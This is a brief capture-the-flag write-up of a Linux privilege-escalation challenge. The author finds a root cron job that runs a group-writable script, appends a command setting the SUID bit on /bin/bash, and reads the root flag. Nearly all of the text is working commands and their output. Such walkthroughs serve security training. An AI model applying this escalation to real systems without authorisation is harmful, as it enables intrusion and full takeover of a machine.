We are told that we can login over ssh at crontab.hkn using the username:password pair doomguy:doomguysEcReTpAsSwOrD, and to run tail -f read.sh.log. Logging in we are also told that crontab is running /etc/read.sh.

So lets check the crontab, checking in /etc/cron.d/ we find execute-cron containing the line:

* * * * * /etc/read.sh >> /home/doomguy/read.sh.log

So the /etc/read.sh script is run every minute, lets check the permissions on the script:

$ ls -l /etc/read.sh
---x-w---- 1 root root-traverse 50 Apr 13 22:37 /etc/read.sh

Hmm… we cant read the file, the group on the file is root-traverse and can have write permissions, are we in the root-traverse group?

$ groups
doomguy root-traverse

Yes, we are, so lets insert a command to let us become root, for this I chose to set the suid bit on /bin/bash so I could become root using /bin/bash -p:

$ echo "chmod u+s /bin/bash" >> /etc/read.sh

And then waiting a minute, we see that /bin/bash has the suid bit set and we become root:

$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1437832 Jan  7  2023 /bin/bash

$ /bin/bash -p
# cd /root

# ls
844bed697a9db4fd6a6aa5178cd2123flag.txt  hehe.txt

# cat 844bed697a9db4fd6a6aa5178cd2123flag.txt
DDC{v3ry-funny-cr0n-j0b}